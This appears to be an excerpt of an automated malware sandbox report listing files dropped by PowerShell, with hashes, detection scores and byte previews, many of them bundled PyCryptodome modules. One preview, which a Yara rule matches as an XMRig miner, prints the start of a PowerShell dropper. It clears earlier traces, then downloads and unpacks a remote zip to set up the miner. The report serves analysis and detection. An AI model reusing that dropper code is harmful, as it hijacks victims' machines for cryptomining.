                                                                                                                                                                                                                              SSDEEP:393216:cTYFcRZVzcOJZbmie7M6Z116OPQS6JtUINrJAqW5DwqXXuW61WrUhUwvJXBgSbWq:c1ZZBJNmiqM6Zb6FTt1NrCqW5DXXuuIp
                                                                                                                                                                                                                              MD5:D85EF051F6EFF32F7A63D11252A09627
                                                                                                                                                                                                                              SHA1:1E5513E31246384F9AF9A3CA29061F23CE3069D3
                                                                                                                                                                                                                              SHA-256:E197C9D67E0BE3B3211F4BAC9D95E2591A92926B5F6BC8FAF7492DCA0DFB82CF
                                                                                                                                                                                                                              SHA-512:245386F2124296E3C9A1EF97301F3F14F57B9D7A4D8891A833F77249FDD30055559DCF2F1C9A65E96F98CFB80C3E10B96D9DD378F596BBF96103EBEC48FFD969
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:PK...........X....:...........pyops/_asyncio.pyd.}.xT..I.@H.. .....&.!.....!....D...dH&d$..3g .T.$.x...V..Z......j..5!j..A....Z{.N.....T.....9g..........|$....^{..^k.....;.4A.......N.}..W..S.a...F..<p......7y.bk..!.n...>._..{.@.'z}b.eb...S.....q|y~.]...k?...'}'./.i#Y9b..T.....)#_..-.c..p.n.i...:.E*Sy.E:+.z_.o.q..R]).....6_kk....ibf....t...O._...-E...0...JAL!.....E........(...jS.GF.H.p....B.\l."t.........?...'.P....;[kA(.=m2.3p.l...'.....0.....D .D..vv.W..M.C.3.~v.j.U.......'..7......zx&..o..C..4..!..yEs..A.........t)".e......r..TNJ.g..)u..YN..vg..S.&J..T+).c.!V.m..e...Z'....T..@bL...y..v...6.~,..;.!y....k_f.m..2$..!...7a.H^...j.L5.PSb.Y.5vS..5E...F2..AM..f..|.)"..:. .wI.."I..J..+bm.~...f...!.[|....9.0.3.pA........o.....v.6...t![;..0....m._...s......m.`....2.v.5....v..@....v..1B.}..X;.f....z`.<f.....`..w.t.O..k..&P....h...I..J.....-......z........a.......f.|.}..j".L.Tkg..R.Y|?.^..IW%W....";%)o..U.....8.H9(R...C.....Ej.;l1..G..>...D...<.Z.t)
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2459
                                                                                                                                                                                                                              Entropy (8bit):5.205235791857021
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:IezaHOz1oSO9Tt1vKWZJy7pzA0P984EX6me69pDqHZGwa1C4O98d:Iez0Oz1ZO9TfVfyB8rqWyZGwa1A2
                                                                                                                                                                                                                              MD5:C062B4E95056DC3035E124DCD0AAC622
                                                                                                                                                                                                                              SHA1:2034E5CC8CDD5106BBB1B74DB7C60F1F79B679BD
                                                                                                                                                                                                                              SHA-256:4C4063245C81795AFC21B26CA78729983F919DEA19FB4594ED68E9F09C44651D
                                                                                                                                                                                                                              SHA-512:38612F64FE9C7454E8D147D32C694EBE28D8DFC043821F0EA21E6FCBBC85B1720EBE35EF40C7151B6AC86E0EBDB68D73E24D3B22C01CC55E0E64D8D2D3B58E3B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Local\Temp\funny.tmp, Author: Joe Security
                                                                                                                                                                                                                              Preview:# Check and return current user name..$currentUserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.Split('\')[1]..# Paths..$dircheck = "C:\ProgramData\.logstxt"..#$filcheck = "C:\path\to\xmrig.service" # You might need to adjust this, Windows doesn't have an equivalent to systemd..$filcheck = "C:\Users\$currentUserName\xmrig.exe"..# Removal functions..if (Test-Path $dircheck) {.. Remove-Item -Recurse -Force $dircheck..}..if (Test-Path $filcheck) {.. Remove-Item -Force $filcheck..}....Add-Type -Assembly "System.IO.Compression.Filesystem"..$ProgressPreference = 'SilentlyContinue'..# Download files, I am using ngrok as port forwarding for my containers to FTP server..Invoke-WebRequest -Uri 'https://files.catbox.moe/1qm51s.zip' -OutFile 'temp.zip'..[System.IO.Compression.ZipFile]::ExtractToDirectory('temp.zip', '.')....# Create xmrig service file (assuming this has an equivalent in Windows)..# TODO: Check if you need an actual service wrapper like NSSM....# Get
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):331264
                                                                                                                                                                                                                              Entropy (8bit):5.532137859819159
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:yejl5QCuDlXW4+DiErv2yKU9pclGrDkXNBe:vl5QCKdW4+DiNlXNBe
                                                                                                                                                                                                                              MD5:BECEAE2FDC4F7729A93E94AC2CCD78CC
                                                                                                                                                                                                                              SHA1:47C112C23C7BDF2AF24A20BD512F91FF6AF76BC6
                                                                                                                                                                                                                              SHA-256:F689EE9AF94B00E9E3F0BB072B34CAAF207F32DCB4F5782FC9CA351DF9A06C97
                                                                                                                                                                                                                              SHA-512:073F5AE0D4FFEDB5EDB3B92B8E19BEA2C482A3AD7AB02ED71955D3E55AA44A297307FE4334D28C6F7683CB02D40B4313E560C9049507B16A8C5D6EE0A0F0071F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........HK.)%..)%..)%..{...)%..{...)%...^..)%..)$.e)%..{...)%..{...)%..{...)%.Rich.)%.................PE..d....@.T..........#............................@.............................P...............................................................v..........._........................................................................... ...............................text...-........................... ..`.rdata...m... ...n..................@..@.data....>...........v..............@....pdata..............................@..@.rsrc...._.......`..................@..@........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5559296
                                                                                                                                                                                                                              Entropy (8bit):6.91179307373266
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:49152:riFqMELV+H7BLF/MsnU6TRfrguw5Sf+x2/+52Q+:ri
                                                                                                                                                                                                                              MD5:76CC0193955695FEE0F72CD0006E86A4
                                                                                                                                                                                                                              SHA1:D14AAAD60F3F0E63A3DFD0224B922D9F16079E61
                                                                                                                                                                                                                              SHA-256:3BA326D21BB242488C0284EBC32FD6DBC94025ECAB34862015A5C95EB178C961
                                                                                                                                                                                                                              SHA-512:EF0B48E9B80BBEA6AD210CE1C38B7E7031B72191150825C220F37326A01FDD3331E1E60911A24D060921E352B7F501D863039921B30FA9B975A756A686308DB6
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_V..>8R.>8R.>8RC..R.>8R.>9R.>8RZ..R.>8RZ..R.>8RZ..R.>8R...R.>8R...R.>8R...R.>8RRich.>8R........................PE..d......e.........." .....r....T..............................................0U...........`...........................................T.p....T.(.............U.............. U.......................................T.p............................................text....p.......r.................. ..`.rdata..P2T......4T..v..............@..@.data....5....T.......T.............@....pdata........U.......T.............@..@.reloc....... U.......T.............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44733952
                                                                                                                                                                                                                              Entropy (8bit):6.608208262250489
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:786432:XBsHMHxPHy0EX5Pe1R7gjOUXFhgsko6sMXcy:XPHy3PeH7cf/Qv
                                                                                                                                                                                                                              MD5:7EC47BBA001C5BC96F6B4D40CD9FEC97
                                                                                                                                                                                                                              SHA1:AD67EDFC0728BB7D74D66CB9580840B5A426D59E
                                                                                                                                                                                                                              SHA-256:E55461F252B519478E9BF09F8BD1F0F3B6E3064C9270FAC6A29D6EB23216835C
                                                                                                                                                                                                                              SHA-512:8B63E6162C5C303CF95A7BA621EF2879B63C79D321A829A49CD50083BC30C3C49C7326B6242F92D29B77CEDDDBA1A5C9DDEC62E8955DDCE1A2F11CB9B4B00E0E
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............._.._.._.*L_.._...^.._.._.._.*I_.._.._.._...^.._...^.._...^.._]uE_.._...^.._...^.._...^.._...^@._...^.._..}_.._...^.._Rich.._........PE..d...!..e.........." .........N......D.;......................................@............`..........................................Mx......Ox.x................y........... ......0.e.....................P.f.(...P.e..............................................text............................... ..`.rdata..............................@..@.data.....)..px......Nx.............@....pdata...y.......z..................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9670
                                                                                                                                                                                                                              Entropy (8bit):4.704181472916713
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:9qrskrs9t3q/IYRDPyZmiCbebOg5n8znjoqOGFyk:0rskrs9VqVwUbbeSg58zjoqOi3
                                                                                                                                                                                                                              MD5:42FF26371B56C5C3B6EB371D0DD95D0D
                                                                                                                                                                                                                              SHA1:90ADFE0DFC3912F2360749B29E4793B6793F26C9
                                                                                                                                                                                                                              SHA-256:D810141E84ABEF8948D031C63BBC72D9893090AFF62CD21FA89AB64DE09CEC84
                                                                                                                                                                                                                              SHA-512:7BCF47527D8F034A8DA182FC5125F63ED0A3685C8D1D19EC6D6013D9BABA452921612196590D03309BF878166021A5C5BA9AC30C7E94546A7F913E5DDA250420
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):938
                                                                                                                                                                                                                              Entropy (8bit):4.770904354494787
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1REL4yNT37rEWAnm1WWLB/qs/qn/HLB/M4LB/1/s/3LB/QVP:l4DQxMB/qs/qn/rB/MGB/1/s/7B/QVP
                                                                                                                                                                                                                              MD5:17D9AB9AB96D9645BD7BAA7403392355
                                                                                                                                                                                                                              SHA1:63DFBC424021764FA0B7BE930C76F99F7D097DAB
                                                                                                                                                                                                                              SHA-256:2F79FA6D217978DB2C5A7CF297E73E555C2100E86FA5B2CB4C1DEFFCCAE353DF
                                                                                                                                                                                                                              SHA-512:E6A62201B77C98236B57E93275C666C03CE6D17DF29380D871DA9F55F9D2C01B4EE1901C8C9A95CB7307FD06CCD9CF9CD6FF768693EB30706F236439B253E0D4
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:from typing import Any, Union..from types import ModuleType....Buffer = Union[bytes, bytearray, memoryview]....class BLAKE2b_Hash(object):.. block_size: int.. digest_size: int.. oid: str.... def __init__(self,.. data: Buffer,.... key: Buffer,.... digest_bytes: bytes,.... update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> BLAKE2b_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ..... def new(self,.. data: Buffer = ...,... digest_bytes: int = ...,... digest_bits: int = ...,... key: Buffer = ...,... update_after_digest: bool = ...) -> BLAKE2b_Hash: .......def new(data: Buffer = ...,...digest_bytes: int = ...,...digest_bits: int = ...,...key: Buffer = ...,...update_after_digest: bool = ...) -> BLAKE2b_Hash: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9676
                                                                                                                                                                                                                              Entropy (8bit):4.694251411457854
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:9qrskrs9t3q/IFU1Uy9XiCJ5bfD5Z8znjJQfzdT:0rskrs9VqIARbJ5DD52zjJQfzx
                                                                                                                                                                                                                              MD5:78E109013B7F37E3CA1F6299E2B222D4
                                                                                                                                                                                                                              SHA1:1D70156D7C14F8268882C588E67F27CBC55B4479
                                                                                                                                                                                                                              SHA-256:19798A2A1D438C0DD3538193B4284C11DA04D6FD52F7E58AEA9A95AF1E8BAE68
                                                                                                                                                                                                                              SHA-512:A6978AEDD9A4567F6231FFE10072227B55A4CF97132009FA1491321F11EDA3C1E5AE119156900B19D64E6E73A85DBF6F3D8C04D49471FEE68754FF8A8C0951A1
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):765
                                                                                                                                                                                                                              Entropy (8bit):4.852088276642615
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1REYBPvIY3MRyaRyLu1ApV2+tCwF5RwW0WFWIZyp4LB/d3/i3/3LB/QVxI:1RE6T3QrEWAnJ1Wr4LB/1/s/3LB/QVi
                                                                                                                                                                                                                              MD5:43A377A44F7A80190635F78E745C64C3
                                                                                                                                                                                                                              SHA1:FDDEC7439E99FF7376364061B817E985EC291550
                                                                                                                                                                                                                              SHA-256:25933F08745028C43450B44E6926A00942023E68BF934D2A4D032B8F9557C251
                                                                                                                                                                                                                              SHA-512:8C087F9A1BFF5B0F48A2B766CB4B81BBEF8D18461C9369C71F4431D90343822099A6DAFD74DA565D53D43131A727228BB8487C8503ADC4573E585187B76BDE5C
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:from typing import Any, Union....Buffer = Union[bytes, bytearray, memoryview]....class BLAKE2s_Hash(object):.. block_size: int.. digest_size: int.. oid: str.... def __init__(self,.. data: Buffer,.... key: Buffer,.... digest_bytes: bytes,.... update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> BLAKE2s_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ..... def new(self, **kwargs: Any) -> BLAKE2s_Hash: .......def new(data: Buffer = ...,...digest_bytes: int = ...,...digest_bits: int = ...,...key: Buffer = ...,...update_after_digest: bool = ...) -> BLAKE2s_Hash: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10810
                                                                                                                                                                                                                              Entropy (8bit):4.6888886762336766
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:HJqFQHvo7ESYvHPXmAzr5zkZYewd/3SIzODA/u42MZZFsuKFYR4Aeqt86+:HJYQHvqAzhkZYPN17Zz/pvP+
                                                                                                                                                                                                                              MD5:CB84488361E5F32910E69C4132E5B766
                                                                                                                                                                                                                              SHA1:0591BE7FF0945B36459945ADFDADC3159130509B
                                                                                                                                                                                                                              SHA-256:B61E587E5AA8FD5F958F2C3DAA7E8F8914C3D33D162A3EE4CCF7DCD8277AB56D
                                                                                                                                                                                                                              SHA-512:39B5FC22B4456E0972D636A2F857B643931150723EA9E4FE42F9E663A9453BD24B511BA841D508005259DD2D0A9BC245CF0AB7C5EC9AEEEEEC446DA769E51D4A
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# Hash/CMAC.py - Implements the CMAC algorithm..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# =============
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):852
                                                                                                                                                                                                                              Entropy (8bit):4.7944416507058545
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1RM7CNyT3xFFAo6atxyW1W2oILB/jHV/PtN/Iqw+y:c8ihh+2VB/B/PX/Zw/
                                                                                                                                                                                                                              MD5:2932E4BF5ECDFE63B31A60E94D12EF3D
                                                                                                                                                                                                                              SHA1:369E08734F3A29B7D68FC99B87C20DCE2945A6C7
                                                                                                                                                                                                                              SHA-256:8A9787A689F900E660207C419A0C2B66D3D40DB46D09F4EA9C19543640D26F57
                                                                                                                                                                                                                              SHA-512:723E90748E13290619B03A767ABE5F040149F42E36F6899648F8F450D9297EAC9F560ADBBB1EDCAA2410DF428CBBCAC55D311E6657704B5CA593707CD3496556
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:from types import ModuleType..from typing import Union, Dict, Any....Buffer = Union[bytes, bytearray, memoryview]....digest_size: int....class CMAC(object):.. digest_size: int.... def __init__(self,.... key: Buffer,.. msg: Buffer,.... ciphermod: ModuleType,.... cipher_params: Dict[str, Any],.. mac_len: int, update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> CMAC: ..... def copy(self) -> CMAC: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: .........def new(key: Buffer,.. msg: Buffer = ...,...ciphermod: ModuleType = ...,...cipher_params: Dict[str, Any] = ...,...mac_len: int = ...,.. update_after_digest: bool = ...) -> CMAC: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8383
                                                                                                                                                                                                                              Entropy (8bit):5.035054686221352
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:5J0YDqrYJALrYJHdt3EHGuIWH8ESYXcVGed7VobGKKMidLQBrR8ba/jVtbOixcSc:5JLqrskrs9t3q/IycVGlhiwNRSqzneLl
                                                                                                                                                                                                                              MD5:1B694324354191939445989D02B57552
                                                                                                                                                                                                                              SHA1:459F3C732F46D703844BE242590867B7C336257C
                                                                                                                                                                                                                              SHA-256:BF5BDB55739BC144FFD51BE8696DF86FDDB749EFC794105122BA6882062D1F77
                                                                                                                                                                                                                              SHA-512:559F55B868EBE7C088617A6E960622C75D90138720FF661BCABF74A0C01CB4D52F9F6B0C200CBF3B07DA7457BBED8CC9A445A876DB6232CBE05387BE9087DCEB
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:#..# HMAC.py - Implements the HMAC algorithm as described by RFC 2104...#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAI
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):649
                                                                                                                                                                                                                              Entropy (8bit):4.783061054533155
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1Ro8s7REYB6IvIY3YcRyTkpYRyc1AQ2ZcQ0WrQwgcxW5RwW0WFW2orULB/Q0WHQ4:1RM7C8T3xWFAlrVxW1W2oILB/SH+y
                                                                                                                                                                                                                              MD5:14A386A671119C5A919A33425DBB267C
                                                                                                                                                                                                                              SHA1:938FCE9D2F2D8D12B4E6DCE66CF634F0597E79C5
                                                                                                                                                                                                                              SHA-256:C2C617969E9C441DCC4F844E9B8BA9767F49999272C239BDE88D5F4FAF6A672C
                                                                                                                                                                                                                              SHA-512:99637CA962FF596AB9A740A3360DCA5989F0CA1DBC23C90926A213FC50A3E7A5FBC92DDDA0C62625FAA9A273CE9D6D50BFAC8A9D812BEC12DA2AD8CFE1D6D141
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:from types import ModuleType..from typing import Union, Dict....Buffer = Union[bytes, bytearray, memoryview]....digest_size: int....class HMAC(object):.. digest_size: int.... def __init__(self,.... key: Buffer,.. msg: Buffer,.... digestmod: ModuleType) -> None: ..... def update(self, msg: Buffer) -> HMAC: ..... def copy(self) -> HMAC: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: .........def new(key: Buffer,.. msg: Buffer = ...,...digestmod: ModuleType = ...) -> HMAC: .....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6128
                                                                                                                                                                                                                              Entropy (8bit):5.060949769894483
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:MMDqrYJALrYJHdt3EHGuIWEHrU6vEjHPL4rSgLT2MniHOFEugEjfJQ69t65F:Nqrskrs9t3q/IytSniHYnCK4F
                                                                                                                                                                                                                              MD5:FFA9326A97D6D9F07CC037565AEF8134
                                                                                                                                                                                                                              SHA1:474261D53BE76A00B36A836980CC3C6DC7483794
                                                                                                                                                                                                                              SHA-256:2784C94AFD4E41E49E3370AF0334D1578402E2CF51BFA1E57561D74EAFB5D9A4
                                                                                                                                                                                                                              SHA-512:8B162E0D0843F7DB0AD2D5831A21290A38563E22628A4D20D83EA6D7BC3BBAF71228E8FC1BC2F0B8EDCD6F44800BB909613275A3E14FAF7AF088BE9CE9569D7E
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2021, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):936
                                                                                                                                                                                                                              Entropy (8bit):4.361612751830179
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1REV4yNT3bAGJvdgK1WWLB/V0/V1LBGL8otLB/SmLj:h4rvVsMB/V0/VBBc8cB/S8j
                                                                                                                                                                                                                              MD5:AB6420FC357655A5E7064F63055C551C
                                                                                                                                                                                                                              SHA1:C936732267AB86FF4C74D262883948A23FAF2819
                                                                                                                                                                                                                              SHA-256:383B57B62578122CD924BFA4DCB324233ED0D7A847F89D16BDBD3ED8251240C2
                                                                                                                                                                                                                              SHA-512:EA97C574488210232741126FD97BAC54241937444DAAB8060C6DB1B5965B1D61EDB17643C4B6076E4DEBEA1B8BD15C3285728637944C2352F9E822CF85E4AF36
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
